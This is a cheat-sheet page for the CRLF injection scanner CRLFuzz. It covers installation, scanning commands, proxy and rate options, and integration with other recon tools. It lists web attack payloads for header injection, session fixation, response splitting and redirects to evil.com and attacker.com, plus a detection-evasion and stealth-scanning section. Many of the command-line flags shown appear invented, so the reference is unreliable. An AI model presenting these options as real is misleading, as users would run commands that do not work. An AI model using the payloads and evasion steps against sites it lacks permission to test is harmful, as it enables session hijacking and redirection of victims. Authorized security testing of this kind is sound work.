CRLFuzz
Overview
Abschnitt betitelt „Overview“CRLFuzz is a lightweight, fast CRLF (Carriage Return Line Feed) injection vulnerability scanner written in Go. It efficiently detects CRLF injection vulnerabilities across web applications by testing parameters and headers against multiple payloads. The tool is ideal for bug bounty hunters and penetration testers conducting security assessments on web applications.
Installation
Abschnitt betitelt „Installation“Prerequisites
Abschnitt betitelt „Prerequisites“- Go 1.11+ (for building from source)
- Or download precompiled binaries
From Source
Abschnitt betitelt „From Source“git clone https://github.com/dwisiswant0/crlfuzz.git
cd crlfuzz
go build -o crlfuzzmacOS/Linux (Binary)
Abschnitt betitelt „macOS/Linux (Binary)“wget https://github.com/dwisiswant0/crlfuzz/releases/download/v1.5.0/crlfuzz_1.5.0_linux_amd64.tar.gz
tar -xvf crlfuzz_1.5.0_linux_amd64.tar.gz
chmod +x crlfuzzHomebrew (macOS)
Abschnitt betitelt „Homebrew (macOS)“brew install dwisiswant0/tap/crlfuzzWindows
Abschnitt betitelt „Windows“Download .exe from releases: https://github.com/dwisiswant0/crlfuzz/releases
Basic Usage
Abschnitt betitelt „Basic Usage“| Command | Description |
|---|---|
crlfuzz -u <url> | Scan single URL |
crlfuzz -l <file> | Scan URLs from file |
crlfuzz -u <url> -v | Verbose output |
crlfuzz --help | Show help menu |
crlfuzz -u <url> -c 10 | Set concurrency level |
Single URL Scanning
Abschnitt betitelt „Single URL Scanning“Basic Scan
Abschnitt betitelt „Basic Scan“crlfuzz -u 'http://example.com/?page=test'With Verbose Output
Abschnitt betitelt „With Verbose Output“crlfuzz -u 'http://example.com/?page=test' -vShow Request/Response Details
Abschnitt betitelt „Show Request/Response Details“crlfuzz -u 'http://example.com/?name=value' -v --show-req --show-respBatch Scanning
Abschnitt betitelt „Batch Scanning“Scan Multiple URLs from File
Abschnitt betitelt „Scan Multiple URLs from File“crlfuzz -l urls.txtCreate urls.txt:
http://example.com/?page=test
http://example.com/?user=admin
http://example.com/?id=123Scan All URLs with Verbose Mode
Abschnitt betitelt „Scan All URLs with Verbose Mode“crlfuzz -l urls.txt -vOutput Results to File
Abschnitt betitelt „Output Results to File“crlfuzz -l urls.txt -o results.txtConcurrency and Performance
Abschnitt betitelt „Concurrency and Performance“Adjust Concurrency Level
Abschnitt betitelt „Adjust Concurrency Level“crlfuzz -l urls.txt -c 25Default is 10 concurrent requests. Increase for larger scans.
Maximum Concurrency
Abschnitt betitelt „Maximum Concurrency“crlfuzz -l urls.txt -c 100Use cautiously to avoid overwhelming target servers.
Timeout Configuration
Abschnitt betitelt „Timeout Configuration“crlfuzz -u 'http://example.com/?test=value' -t 30Set timeout in seconds (default is 10 seconds).
Payload Configuration
Abschnitt betitelt „Payload Configuration“Default Payloads
Abschnitt betitelt „Default Payloads“CRLFuzz includes built-in CRLF injection payloads:
%0d%0a (URL-encoded CRLF)
%0d (CR only)
%0a (LF only)
\r\n (Raw CRLF)Custom Payload File
Abschnitt betitelt „Custom Payload File“crlfuzz -u 'http://example.com/?page=test' -payloads custom-payloads.txtCreate custom-payloads.txt:
%0d%0a
%0d%0aSet-Cookie:admin=true
%0d%0aLocation:http://evil.com
%0d%0aX-Injected:valueTest Specific Injection Points
Abschnitt betitelt „Test Specific Injection Points“crlfuzz -u 'http://example.com/?param=VALUE' -payloads payloads.txtCRLFuzz replaces VALUE with each payload.
Header Testing
Abschnitt betitelt „Header Testing“Test Custom Headers
Abschnitt betitelt „Test Custom Headers“crlfuzz -u 'http://example.com/' -H 'X-Forwarded-For: test' -vMultiple Custom Headers
Abschnitt betitelt „Multiple Custom Headers“crlfuzz -u 'http://example.com/' -H 'User-Agent: test' -H 'X-Custom: value'Test All Headers
Abschnitt betitelt „Test All Headers“crlfuzz -u 'http://example.com/?page=test' --test-headersParameter Fuzzing
Abschnitt betitelt „Parameter Fuzzing“Scan All Parameters
Abschnitt betitelt „Scan All Parameters“crlfuzz -u 'http://example.com/?page=test&user=admin&id=123'Automatically tests all parameters for CRLF injection.
Focus on Specific Parameter
Abschnitt betitelt „Focus on Specific Parameter“crlfuzz -u 'http://example.com/?page=test' -param 'page'Exclude Parameters from Testing
Abschnitt betitelt „Exclude Parameters from Testing“crlfuzz -u 'http://example.com/?page=test&id=123' -skip 'id'Output Formats
Abschnitt betitelt „Output Formats“Default Text Output
Abschnitt betitelt „Default Text Output“crlfuzz -u 'http://example.com/?test=value'Output shows:
- URL
- Vulnerable parameter
- Payload used
- Response status code
JSON Output
Abschnitt betitelt „JSON Output“crlfuzz -l urls.txt -o results.json -jsonCSV Export
Abschnitt betitelt „CSV Export“crlfuzz -l urls.txt -o results.csv -csvSuppress Output
Abschnitt betitelt „Suppress Output“crlfuzz -l urls.txt -qQuiet mode - only shows results.
Proxy Configuration
Abschnitt betitelt „Proxy Configuration“HTTP Proxy
Abschnitt betitelt „HTTP Proxy“crlfuzz -u 'http://example.com/?test=value' -proxy http://127.0.0.1:8080SOCKS5 Proxy
Abschnitt betitelt „SOCKS5 Proxy“crlfuzz -u 'http://example.com/?test=value' -socks5 127.0.0.1:1080Proxy with Authentication
Abschnitt betitelt „Proxy with Authentication“crlfuzz -u 'http://example.com/?test=value' -proxy http://user:pass@127.0.0.1:8080SSL/TLS Options
Abschnitt betitelt „SSL/TLS Options“Ignore SSL Certificate Errors
Abschnitt betitelt „Ignore SSL Certificate Errors“crlfuzz -u 'https://example.com/?test=value' --insecureUse Custom CA Certificate
Abschnitt betitelt „Use Custom CA Certificate“crlfuzz -u 'https://example.com/?test=value' --ca-cert /path/to/ca.crtHTTP Methods and Request Customization
Abschnitt betitelt „HTTP Methods and Request Customization“Test POST Parameters
Abschnitt betitelt „Test POST Parameters“crlfuzz -u 'http://example.com/' -method POST -data 'param=VALUE&user=test'PUT Request
Abschnitt betitelt „PUT Request“crlfuzz -u 'http://example.com/api/resource' -method PUT -data 'field=VALUE'Custom Request Body
Abschnitt betitelt „Custom Request Body“crlfuzz -u 'http://example.com/api' -method POST -data '{"key":"VALUE"}'Add Request Headers
Abschnitt betitelt „Add Request Headers“crlfuzz -u 'http://example.com/?test=VALUE' -H 'Authorization: Bearer token' -H 'Content-Type: application/json'Response Analysis
Abschnitt betitelt „Response Analysis“Show Response Headers
Abschnitt betitelt „Show Response Headers“crlfuzz -u 'http://example.com/?test=value' -v --show-respShow Response Body
Abschnitt betitelt „Show Response Body“crlfuzz -u 'http://example.com/?test=value' -v --show-bodyFilter by Status Code
Abschnitt betitelt „Filter by Status Code“crlfuzz -l urls.txt --filter-status 200Only test URLs that return status 200.
Advanced Filtering
Abschnitt betitelt „Advanced Filtering“Match Success by Response Content
Abschnitt betitelt „Match Success by Response Content“crlfuzz -u 'http://example.com/?test=value' -match 'Set-Cookie'Consider vulnerability confirmed if response contains “Set-Cookie”.
Filter Responses Containing Text
Abschnitt betitelt „Filter Responses Containing Text“crlfuzz -l urls.txt -match 'Location:' -o vulnerable.txtRate Limiting
Abschnitt betitelt „Rate Limiting“Request Delay (Milliseconds)
Abschnitt betitelt „Request Delay (Milliseconds)“crlfuzz -l urls.txt -delay 100Add 100ms delay between requests.
Requests Per Second
Abschnitt betitelt „Requests Per Second“crlfuzz -l urls.txt -rate 10Limit to 10 requests per second.
Common Workflows
Abschnitt betitelt „Common Workflows“Quick Vulnerability Scan
Abschnitt betitelt „Quick Vulnerability Scan“crlfuzz -u 'http://example.com/?page=home&user=test'Comprehensive Bug Bounty Scan
Abschnitt betitelt „Comprehensive Bug Bounty Scan“crlfuzz -l target-urls.txt -v --show-req --show-resp -o findings.txtStealth Scanning
Abschnitt betitelt „Stealth Scanning“crlfuzz -l urls.txt -delay 500 -c 5 --insecureLarge-Scale Assessment
Abschnitt betitelt „Large-Scale Assessment“crlfuzz -l thousands-of-urls.txt -c 50 -t 30 -json -o results.jsonCRLF Injection Attack Vectors
Abschnitt betitelt „CRLF Injection Attack Vectors“Header Injection Attack
Abschnitt betitelt „Header Injection Attack“Payload: %0d%0aSet-Cookie:admin=true
Result: Response header contains injected Set-CookieResponse Splitting
Abschnitt betitelt „Response Splitting“Payload: %0d%0a%0d%0aHTTP/1.1 200 OK
Result: Ability to split HTTP responseSession Fixation
Abschnitt betitelt „Session Fixation“Payload: %0d%0aSet-Cookie:SESSIONID=attacker-controlled
Result: Force victim session IDOpen Redirect via Headers
Abschnitt betitelt „Open Redirect via Headers“Payload: %0d%0aLocation:http://evil.com
Result: Redirect user to malicious siteCache Poisoning
Abschnitt betitelt „Cache Poisoning“Payload: %0d%0aX-Original-URL:/cache-buster
Result: Poison cached responsesUnderstanding CRLFuzz Output
Abschnitt betitelt „Understanding CRLFuzz Output“Example Output
Abschnitt betitelt „Example Output“[CRLF] http://example.com/?page=VALUE
[PARAMETER] page
[PAYLOAD] %0d%0aSet-Cookie:admin=true
[STATUS] 200
[FOUND] YesVulnerability Indicators
Abschnitt betitelt „Vulnerability Indicators“- Status code change after injection
- Additional headers in response
- Response splitting evidence
- Cookie manipulation detection
Detection Evasion
Abschnitt betitelt „Detection Evasion“Randomize User-Agent
Abschnitt betitelt „Randomize User-Agent“crlfuzz -u 'http://example.com/?test=value' -H 'User-Agent: Mozilla/5.0 (random)'Vary Request Patterns
Abschnitt betitelt „Vary Request Patterns“crlfuzz -l urls.txt -delay 500 -c 3Rotate Through Payloads
Abschnitt betitelt „Rotate Through Payloads“crlfuzz -u 'http://example.com/?test=value' -payloads rotating-payloads.txtTroubleshooting
Abschnitt betitelt „Troubleshooting“Connection Timeout
Abschnitt betitelt „Connection Timeout“crlfuzz -u 'http://slow-server.com/?test=value' -t 60Increase timeout to 60 seconds.
Too Many Errors
Abschnitt betitelt „Too Many Errors“crlfuzz -l urls.txt -c 5 -t 30Reduce concurrency and increase timeout.
SSL Certificate Issues
Abschnitt betitelt „SSL Certificate Issues“crlfuzz -u 'https://example.com/?test=value' --insecureBypass SSL verification.
Not Finding Vulnerabilities
Abschnitt betitelt „Not Finding Vulnerabilities“crlfuzz -u 'http://example.com/?test=value' -payloads extended-payloads.txt -vTry with custom payloads and verbose mode.
Best Practices
Abschnitt betitelt „Best Practices“- Obtain authorization before scanning production systems
- Start with low concurrency and increase gradually
- Use appropriate timeouts for slow servers
- Test parameters individually for precise results
- Review all findings carefully for false positives
- Combine with other scanners for comprehensive testing
- Keep tool updated for latest payload detection
Payload Examples
Abschnitt betitelt „Payload Examples“Basic CRLF
Abschnitt betitelt „Basic CRLF“%0d%0aHeader Injection
Abschnitt betitelt „Header Injection“%0d%0aX-Injected-Header:valueCookie Injection
Abschnitt betitelt „Cookie Injection“%0d%0aSet-Cookie:name=valueLocation Redirect
Abschnitt betitelt „Location Redirect“%0d%0aLocation:http://attacker.comIntegration with Other Tools
Abschnitt betitelt „Integration with Other Tools“Pipe URLs from httpx
Abschnitt betitelt „Pipe URLs from httpx“httpx -l domains.txt | crlfuzz -With Wayback Machine URLs
Abschnitt betitelt „With Wayback Machine URLs“waybackurls example.com | crlfuzz -Combine with Parameter Fuzzer
Abschnitt betitelt „Combine with Parameter Fuzzer“ffuf -w params.txt -u 'http://example.com/?FUZZ=test' | crlfuzz -Performance Tips
Abschnitt betitelt „Performance Tips“- Increase concurrency for large URL lists
- Use shorter timeouts for quick scans
- Test parameters in separate scans if needed
- Monitor CPU and network usage
- Use filtering to reduce false positives
Legal Considerations
Abschnitt betitelt „Legal Considerations“CRLFuzz is for authorized security testing only. Always obtain explicit written permission before testing any system. Unauthorized access and scanning is illegal.
Resources
Abschnitt betitelt „Resources“- GitHub: https://github.com/dwisiswant0/crlfuzz
- CRLF Injection Guide: https://owasp.org/
- Bug Bounty Resources: https://hackerone.com/
- Community: Active GitHub discussions and issues